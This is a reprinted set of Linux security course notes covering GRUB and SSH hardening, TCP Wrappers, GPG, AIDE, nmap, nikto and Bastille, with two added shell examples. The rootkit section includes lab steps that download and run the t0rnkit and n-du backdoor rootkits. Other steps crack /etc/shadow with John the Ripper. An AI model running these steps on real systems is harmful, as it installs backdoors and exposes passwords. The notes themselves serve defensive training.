### LinuxCBT Basic Security Edition ###
BIOS
1.Disable all unnecessary boot media
2.Set a setup password
3.Set a system password
front bezel chassis information
DELL PowerEdge 2600
GRUB
How to enter
when the kernel selection menu shows up, press E
'single' or 'init 1' enters single-user mode
Note: in single-user mode, networking is not enabled
/sbin/grub-md5-crypt
cd /sbin/
./grub-md5-crypt - generates the MD5 hash used to set the GRUB password
grub config is located at:
/boot/grub/grub.conf
or /etc/grub.conf (symlink of above)
under the timeout line add the following line:
password --md5 $1$5nV2i1$sj7qEsjQATwUwlz4zBZrl.
Boot-up security measures/checks
/var/log/dmesg
which dmesg
dmesg | grep -i cpu
dmesg | grep -i selinux
1.Check the kernel version - should match the installed/patched version
grep -i mem /var/log/dmesg
2.CPU
3.Memory
4.Hard Drive(s)
5.Network Interface(s)
/var/log/boot.log
df -h
1.net.ipv4.ip_forward = 0
2.net.ipv4.conf.default.accept_source_route = 0
init process
1.BIOS(floppy/CD-ROM/Keyboard/etc,/drives)
2.GRUB - (Menu)
3.Kernel(Linux) - Initializes hardware
4.init - first user-space processes - /etc/inittab
remote access card
/etc/inittab
1.Default Run-Level to 3 from 5
a.No X Window System TCP listener
b.Uses fewer system resources
2.Disable CTRL-ALT-DEL reboot
3.Reduce the number of TTYs
init q #reload /etc/inittab
ps -ax | grep -i mingetty
rpm -qa >`date +%F`.installed.packages.list
TTYs
1.Log on whenever possible as a non-privileged user
2.su to root only when necessary
'/etc/security/'
/etc/ssh/sshd_config
1.Deny root login
Banner Implementation
1.Edit the banner-related files, which include:
'/etc/issue' - shown before login
This system is for the use of authorized users only. Individuals using this computer system without authority, or in excess of their authority, are subject to having all of their activities on this system monitored and recorded by system personnel.
'/etc/motd' - shown after login
This is a monitored Computer System!!!
2.Update '/etc/ssh/sshd_config' to use 'Banner /etc/issue'
3.Reload the sshd service
who/w/whoami
Useful utilities
1.last
a.returns users that have recently logged on to the system
/var/log/wtmp
2.netstat - shows listening/connected sockets
a.netstat -ntlp
b.netstat -nulp
c.netstat -ant
lsof
located at /usr/sbin/lsof
lsof /tmp
lsof -i #review only network sockets
lsof -i@localhost #review only sockets on localhost
lsof -iTCP@localhost
lsof -iUDP@localhost
lsof -iTCP@localhost:22
lsof -p pid #show files opened by the process with the specified pid
lsof -c processname #show files opened by processes with the specified name
syslog - logs and routes messages to files/systems/etc
Facilities/Priorities
Facilities: kernel/mail/local/user; priorities range from debug (lowest) to emerg (highest)
/etc/syslog.conf
authpriv.* /var/log/secure
/var/log/messages
NTP
NTP Server:192.168.1.109 - linuxcbtserv3.linuxcbt.internal
yum install ntp
edit the /etc/ntp.conf file
service ntpd restart
ntpq -np
linuxcbtserv2 (stratum 3) -> linuxcbtserv3 (stratum 2) -> Internet NTP hosts (stratum 1)
rsyslog-replicate
vim /etc/rsyslog.conf
uncomment the two lines below:
#$ModLoad imudp
#$UDPServerRun 514
mail.* @192.168.1.109
*.* @192.168.1.109
netstat -ntlp | grep 25
nmap upgrade
http://www.insecure.org
rpm -ltn nmap*.rpm
view files in the rpm packages
rpm -qpl nmap*.rpm
rpm -Uvh package*.rpm //upgrade package
wget http://nmap.org/dist/nmap-6.46.tar.bz2
rpm -vhU http://nmap.org/dist/nmap-6.46-1.i386.rpm;
rpm -vhU http://nmap.org/dist/zenmap-6.46-1.noarch.rpm;
rpm -vhU http://nmap.org/dist/ncat-6.46-1.i386.rpm;
rpm -vhU http://nmap.org/dist/nping-0.6.46-1.i386.rpm;
NMAP
root: opens half-connections (SYN scan, handshake never completed)
nmap -> (TCP SYN) -> Target -> (SYN|ACK) -> nmap
non-privileged user: opens standard (full) TCP connections
nmap -> (TCP SYN) -> Target -> (SYN|ACK) -> nmap -> (ACK) -> Target
nmap -v localhost
rpm -ql nmap
nmap -v -oN nmap.scan.1 localhost
nmap -v -sU localhost //UDP scan
NMAP lockdown
chkconfig --list cups
chkconfig cups off
nmap -v -p 631 localhost
nmap -v -O localhost
nessus
Client (Windows | Linux | UNIX) -> SSL -> Server (UNIX | Linux)
Telnet && vsftpd
yum install telnet telnet-server
apt-get install telnetd
yum install vsftpd
apt-get install vsftpd
3 Layers of security
XINETD -> TCPWrappers -> TELNETD(/usr/sbin/in.telnetd)
TCPWrappers (/etc/{hosts.allow|hosts.deny})
1.Parse hosts.allow (place allow rules here)
2.Parse hosts.deny (place the catch-all deny rule here)
3.If no match in either file, grant access
Note: hosts.allow and hosts.deny are read on every connection, so rule changes take effect immediately
telnet shows the /etc/issue.net file at login
/etc/xinetd.d/telnet
only_from = 192.168.1.113 192.168.1.114
port = 23 #default
port = 2323
/etc/hosts.allow
man hosts.allow
#format:service : client_list
in.telnetd : 192.168.1.113
in.telnetd : 192.168.1.0/255.255.255.0
sshd : 192.168.1.0/255.255.255.0
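The three-step evaluation above, modelled as an added example (not the course's own material) in POSIX sh: it reads constructed hosts.allow/hosts.deny samples and decides access for a daemon and client address, handling ALL, exact addresses and net/mask patterns; wrappers_check, file_matches and the sample file paths are assumed names.

```shell
# Added example, not from the course notes: models how TCP Wrappers decides
# access (hosts.allow first, then hosts.deny, then grant by default).
# Assumptions: client patterns are ALL, an exact IPv4 address, or net/mask.
ip_to_int() {                 # 192.168.1.113 -> 32-bit integer
  set -- $(printf '%s' "$1" | tr '.' ' ')
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}
client_matches() {            # $1 = client pattern, $2 = client IP
  case "$1" in
    ALL) return 0 ;;
    */*) net=${1%/*}; mask=${1#*/}
         [ $(( $(ip_to_int "$2") & $(ip_to_int "$mask") )) -eq \
           $(( $(ip_to_int "$net") & $(ip_to_int "$mask") )) ] ;;
    *)   [ "$1" = "$2" ] ;;
  esac
}
file_matches() {              # $1 = file, $2 = daemon, $3 = client IP
  while IFS= read -r line; do
    line=${line%%#*}                                   # drop comments
    case "$line" in *:*) ;; *) continue ;; esac        # skip blank lines
    daemons=$(printf '%s' "${line%%:*}" | tr -d ' ')   # comma-separated list
    clients=$(printf '%s' "${line#*:}" | tr ',' ' ')
    case ",$daemons," in *",ALL,"*|*",$2,"*) ;; *) continue ;; esac
    for pat in $clients; do
      client_matches "$pat" "$3" && return 0
    done
  done < "$1"
  return 1
}
wrappers_check() {            # $1 = daemon, $2 = client IP, $3 = allow file, $4 = deny file
  if file_matches "$3" "$1" "$2"; then echo allow       # 1. hosts.allow
  elif file_matches "$4" "$1" "$2"; then echo deny      # 2. hosts.deny
  else echo allow; fi                                   # 3. no match: access granted
}
# Constructed sample files (not the real /etc/hosts.allow and /etc/hosts.deny)
WORKDIR=$(mktemp -d); ALLOW_SAMPLE=$WORKDIR/hosts.allow; DENY_SAMPLE=$WORKDIR/hosts.deny
cat > "$ALLOW_SAMPLE" <<'EOF'
# format: service : client_list
in.telnetd : 192.168.1.113
sshd : 192.168.1.0/255.255.255.0
EOF
printf 'in.telnetd : ALL\n' > "$DENY_SAMPLE"            # deliberately no ALL : ALL catch-all
wrappers_check in.telnetd 192.168.1.120 "$ALLOW_SAMPLE" "$DENY_SAMPLE"   # deny
wrappers_check sshd 10.0.0.5 "$ALLOW_SAMPLE" "$DENY_SAMPLE"              # allow (step 3)
```

The last call shows why the notes want a catch-all in hosts.deny: with only a daemon-specific deny rule, an unlisted daemon and client fall through to step 3 and are granted.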
Increase security with extended file attributes - chattr
key files include:
/etc/inittab
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/hosts.allow
/etc/hosts.deny
/etc/xinetd.d/telnet
/etc/hosts
/etc/resolv.conf
/etc/nsswitch.conf
lsattr
chattr +i ssh_config
lsattr ssh_config
tcpdump -w tcpdump.log.1
ethereal
tcpdump -w tcpdump.log.1 dst port 23
ftp://anonymous:anonymous@192.168.1.109
SSH Terms/Concepts
SSH is based on PKI
Private Key/Public Key (pair) - asymmetric
~/.ssh/known_hosts (servers' public host keys) - each server has its own host key pair
ssh client -> encrypts data to the server using the server's public key
ssh-keygen -t rsa
Note: ~/.ssh/authorized_keys should have permission 600
Note: check ~/.ssh/authorized_keys files for tampering
SCP(RCP)/SFTP(FTP)(sub-systems of SSH)
scp source destination
SSH Port Forwarding - creates pseudo-VPNs
local port forwarding
ssh_client -> ssh_server - creates encrypted tunnels
1.modify /etc/xinetd.d/telnet
bind = 127.0.0.1
local(127.0.0.1:2323) -> SSH_TUNNEL -> Remote(127.0.0.1:23)
2.ssh -L 2323:127.0.0.1:23 root@192.168.1.109
telnet localhost 2323
remote port forwarding (TODO)
3.ssh -R 23:127.0.0.1:2323 root@192.168.1.109
MD5SUM
md5sum filename
GPG/PGP - PKI -> Asymmetric Encryption
Public Key/Private Key Pair
GPG - encrypts data
Steps:
1.Generate PKI pair(Public/Private Key Pair)
gpg --help | grep gen
gpg --list-keys
a.gpg --gen-key
gpg --fingerprint
Encrypt
gpg -e --armor -r yaowenqiang test.txt (ASCII-armored output, nicely formatted)
gpg --encrypt -r yaowenqiang test.txt
Decrypt
gpg --decrypt test.txt.gpg
gpg -d test.txt.gpg
gpg -o test.txt.gpg.decrypted --decrypt test.txt.gpg
2.Create a web of trust using:
a.gpg --export --armor -o yaowenqiang.asc.pub
b.import trusted user's public key
c.this creates a web of trust between the users
Import
gpg --import jack@ubuntu-11.asc.pub
gpg -e -r jacky --armor -o outputfile inputfile use recipient's name
gpg -e -r 42521BCA(recipient unique id) --armor -o outputfile inputfile
GPG Encryption and Signing
1.Signing is different from Encrypting
2.Signing and Encrypt communications:
a.Proves authenticity
b.encrypts data
3.Signing entails using one's private key to sign the data,
a.recipient decrypts signature using your public key
b.recipient decrypts communications stream using their private key
gpg -eas -r 42521BCA test.txt(sign)
gpg --edit-key 42521BCA(key id)
gpg>trust
5
q
Note: both recipient and sender need to trust each other's public key
GPG verify
gpg --help | grep -i sign
When creating detached signatures, there is no need to specify the recipient's public key; creating a signature depends only on the sender's private key
gpg -ba test.txt.asc
will create a test.txt.asc.asc sign file
gpg -b test.txt.asc
will create a test.txt.asc.sig sign file
copy the .asc and the .sig file together to other systems
Note: when verifying a detached signature and decrypting the contents of its associated encrypted file, do the following:
a.Verify MD5SUM
b.Verify the signature.
gpg --verify sign-file-name encrypted-file-name
gpg --verify test.txt.asc.sig test.txt.asc
c.Decrypt the encrypted file
gpg -d -o test.txt test.txt.asc
http://www.snort.org
MUTT - with GPG/PGP G/PGP Encryptions
m compose new message
echo $MAIL
press the 'p' key when sending a message to show the PGP options
postconf | grep -i interface
vim /etc/postfix/main.cf
change inet_interfaces to all
service postfix restart
mailq
postfix flush
Users and Groups
command line:
yum install system-config-users
system-config-users
/etc/passwd
/etc/shadow
/etc/group
/etc/gshadow
/etc/login.defs
PASS_MAX_DAYS 45
PASS_MIN_DAYS 3
PASS_MIN_LEN 6
PASS_WARN_AGE 7
chage
chage -l root
passwd username
chage -m 3 username
chage -M 3 -W 7 username
for i in $(awk -F: '{print $1}' /etc/passwd); do echo $i; done
for i in $(awk -F: '{print $1}' /etc/passwd); do echo USERNAME: $i; chage -l $i; done
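An added example, not from the course notes, that extends the chage loop above into an ageing audit: it reads a constructed shadow file and classifies each account against the PASS_MAX_DAYS 45 policy; shadow_audit and its status labels are assumed names, and "today" is passed in as a day number so the result is reproducible.

```shell
# Added example, not from the course notes: audit password ageing in a shadow
# file against the login.defs policy above (PASS_MAX_DAYS 45). Assumptions:
# field 5 of the shadow entry (per-account max, set by chage -M) is used when
# present, otherwise the policy value; "today" is given as days since the epoch
# (for a live run: $(( $(date +%s) / 86400 )) and the real /etc/shadow).
shadow_audit() {         # $1 = shadow file, $2 = today in days, $3 = PASS_MAX_DAYS policy
  awk -F: -v today="$2" -v policy="$3" '
    {
      user = $1; hash = $2; last = $3
      max = ($5 == "") ? policy : $5 + 0
      if (hash == "*" || hash ~ /^!/)   status = "locked"       # no password login possible
      else if (last == "" || last == 0) status = "must-change"  # change forced at next login
      else if (today - last > max)      status = "expired"      # older than its max age
      else if (max > policy)            status = "weak-max"     # chage -M value above policy
      else                              status = "ok"
      print user ":" status
    }' "$1"
}
# Constructed sample shadow file (hashes are placeholders, not real ones)
SHADOW_SAMPLE=$(mktemp)
cat > "$SHADOW_SAMPLE" <<'EOF'
root:$6$placeholder$hash:16000:3:45:7:::
alice:$6$placeholder$hash:16200:3:45:7:::
jack:$6$placeholder$hash:16200:0:99999:7:::
jack2:!$6$placeholder$hash:16100:0:99999:7:::
svc:*:16100:0:99999:7:::
newuser:$6$placeholder$hash:0:0:99999:7:::
EOF
shadow_audit "$SHADOW_SAMPLE" 16230 45
```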
userdel
rm -rf linuxcbt{2,3}
john (John the Ripper)
openwall.com
wget http://openwall.com/john/j/john-1.8.0.tar.xz
dtrx john-1.8.0.tar.xz
cd john-1.8.0/src
make
make linux-x86-sse2
su
cd ../run
./john -users:jack2,root,jack /etc/shadow
cat john.pot
./john -show -users:jack2 /etc/shadow
AIDE
tripwire
aide.sourceforge.net
wget http://sourceforge.net/projects/aide/files/aide/0.15.1/aide-0.15.1.tar.gz/download -O aide-0.15.1.tar.gz
tar -tzvf aide-0.15.1.tar.gz
dtrx aide-0.15.1.tar.gz
wget http://sourceforge.net/projects/mhash/files/latest/download\?source\=files -O mhash-0.9.9.9.tar.bz2
dtrx mhash-0.9.9.9.tar.bz2
cd mhash*
./configure
make
make install
cd aide*
apt-get install bison flex
sudo apt-get install --reinstall zlibc zlib1g zlib1g-dev
./configure
make
make install
md5sum /usr/local/bin/aide
7d345c5b2019ab2c03cd0252d9561d87 /usr/local/bin/aide
md5sum src/aide
7d345c5b2019ab2c03cd0252d9561d87 aide
find ./ -name aide.conf
cp aide-0.15.1/doc/aide.conf .
vim aide.conf
types of lines:
1.Variables
a=b
2.Macros
@@define
3.type of files,which includes directories ,to monitor
Note:Monitor files that change infrequently
AIDE Usage:
1.Generate the AIDE DB - aide -c /home/jack/aide.conf --init
2.Check file status - aide -c /home/jack/aide.conf --check
apt-get install genisoimage
mkisofs -V AIDE_FI -J -R -o aide.iso AIDE/
apt-get install wodim
cdrecord -v -eject aide.iso
zcat aide.db.new
mount /media/cdrom
RootKits - provide back-doors to your Linux system
Methods of installation
1.Circumventing GRUB/LiLO security - runlevel 1 access
2.Gain non-privileged account,then elevate to root and install
3.Gain root access,then install rootkit
4.Physical access - Leads to other methods of installation
T0rnkit/Tornkit
wget http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/tk.tgz
./t0rnkit
ChkrootKit - www.chkrootkit.org
runs as a shell script - with helper binaries
wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz.sig
wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
rpm -qf /bin/ls
rpm -qf /usr/bin/find
rpm -qf /usr/bin/du
copy /bin/ls and /usr/bin/find from a similar system, or reinstall ls and find via yum
yum reinstall coreutils findutils
./chkrootkit OPTIONS TESTNAME
ps INFECTED
rpm -qf /usr/bin/top
yum reinstall procps
ifconfig INFECTED
netstat INFECTED
yum reinstall net-tools
make sense
promiscuous mode
rm -rf /usr/src/.puta/
rm -rf /usr/info/
rm -rf /etc/ttyhash
rm -rf /etc/inetd.conf
rm -rf /usr/sbin/in.fingerd
rpm -qf /bin/login
yum reinstall util-linux-ng
vim /etc/rc.sysinit
remove the last two lines
/usr/sbin/nscd is not owned by any package and needs to be copied from another system
Ubuntu system:
dpkg -S /bin/ls
aptitude reinstall coreutils
dpkg -S `which find`
aptitude reinstall findutils
dpkg -S `which netstat`
aptitude reinstall net-tools
dpkg -S `which ps`
aptitude reinstall procps
dpkg -S `which init`
aptitude reinstall upstart
dpkg -S `which login`
aptitude reinstall login
RootKit FAQs:
Usually 3 types:
1.changes key binaries
2.runs as kernel modules - LKM
3.writes directly to /dev/kmem
cat /proc/modules
n-du rootkit - backdoor - UDP listener (UDP:1500)
waits for specially-crafted packets;
when received, n-du switches to TCP:port_specified_by_cracker
packetstormsecurity.com/UNIX/penetration/rootkits
wget http://packetstormsecurity.com/files/download/34483/n-du.tgz
tar -zxvf n-du.tgz && cd n-du && make
copy the client 'n-client' to another system
scp n-client jack@192.168.1.114:
start a daemon
./n-du
Process name.. n-du --(0x804969e)
Process id.... 21637
netstat -nulp
n-du(server) - ./n-du
n-client -./n-client host TCP(1666) UDP(1500)
i.e ./n-client 192.168.1.109 1666 1500
nmap -sU -v 192.168.1.114
nmap -sU -v -p 1500 192.168.1.114
Bastille
bastille-linux.sourceforge.net
wget -O bastille-3.0.9.tar.bz2 'http://sourceforge.net/projects/bastille-linux/files/bastille-linux/3.0.9/Bastille-3.0.9.tar.bz2/download?use_mirror=ncu&download='
dtrx Bastille*
cd Bastille
./Install.sh
export PATH=$PATH:/usr/sbin
yum install cpan
yum install perl-Curses
bastille -c
perl -MCPAN -e shell
cpan> install Curses
apt-get install libcurses-perl
apt-get install perl-tk
bastille //graphical interface
bastille -c //command line interface
bastille --assess
bastille -a
Bastille Linux - Hardening
File Permission: traceroute,ping,ifconfig
which rlogin
Umask: full permissions = 777
777 - 002 = 775 (directory creation permissions for a non-privileged user with umask 002)
777 - 077 = 700 (rwx------ linuxcbt.linuxcbt)
/var/www/html
var/www/html/index.html - var/www/index.html
### Nmap Upgrade ###
Features:
1.NSE - scriptable,extensible,plug-in support
2.Zenmap - Unified GUI - Cross-platform: *nix (Mac OS X, Solaris, Linux, BSD, etc.)
3.Ability to compare and contrast scans
4.Support IPv6 scanning
5.Ability to determine uptime of target system(not always)
Tasks:
1.Upgrade NMap to current version
a.http://nmap.org/dist - download the appropriate binary from here
wget http://nmap.org/dist/nmap-6.46-1.i386.rpm
wget http://nmap.org/dist/sigs/nmap-6.46-1.i386.rpm.asc
b.http://nmap.org/dist/sigs/nmap-6.46-1.i386.rpm.digest.txt - download signatures/hashes from here
c.wget http://nmap.org/data/nmap_gpgkeys.txt
d.'gpg --verify *asc'
e.'gpg --print-md sha256 nmap*.rpm' - confirms SHASUMs
f.'gpg --print-mds nmap*.rpm' - confirms ALL sums
Note: it is not necessary to have the signature file of the target file in order to use 'gpg' to compute and confirm the various digests of the file
g.'rpm -Uvh nmap*.rpm'
h.'/usr/bin/nmap'
Note:primary binary
2.Perform scans
a.'nmap -v -A 192.168.1.0/24' - scan the subnet searching for OS and version
### ZenMap - GUI ###
Features:
1.Cross-platform GUI
2.Provides rich interface for graphing /reporting/comparisons/etc
### nping ###
Features:
1.Included with Nmap package
2.Granular packet probing control:TCP,UDP,ICMP,ARP,etc
3.Falls between standard ping and Nmap
4.Response time measurement
5.Stress-testing: i.e,packet size alteration with specific socket combinations
6.Traceroute:path taken between client and server
Usage:
netstat -rn
1.'nping 192.168.1.1' - ICMP query of 5 packets
2.'nping --tcp -p 80 192.168.1.1' - TCP/SYN scan of port 80
3.'nping --udp -p 123 192.168.1.1' - UDP scan of port 123
4.'nping --udp -p 123 --delay 200ms 192.168.1.1' - UDP scan of port 123 with a 200ms delay between packets
5.'nping --tcp -p 80 -c 1 192.168.1.1' - sends 1 packet to the target
6.'nping --tr 192.168.1.1' - traceroute
7.'nping --tcp -p 80 -c 1 192.168.75.101,13'
### nikto ###
Features:
1.Web server analysis
2.Modular via plug-in
http://cirt.net
wget http://cirt.net/nikto/nikto-2.1.5.tar.bz2
tar xjvf nikto-2.1.5.tar.bz2
Usage:
./nikto.pl -l - list available modules
1.'nikto.pl -h 192.168.1.1'
Note:Nikto found among other things:/doc/ enabled
This reveals versions of installed applications
Note:Nikto found Apache and Key modules versions
Note:Disable server signatures on the server side if this is a concern
./nikto.pl -o `date +%F`.nikto.scan.txt -h 192.168.1.1
./nikto.pl -update
./nikto.pl -T 9 -h 192.168.1.1
Reprinted from: https://my.oschina.net/8pBwdEmxK2hL/blog/266273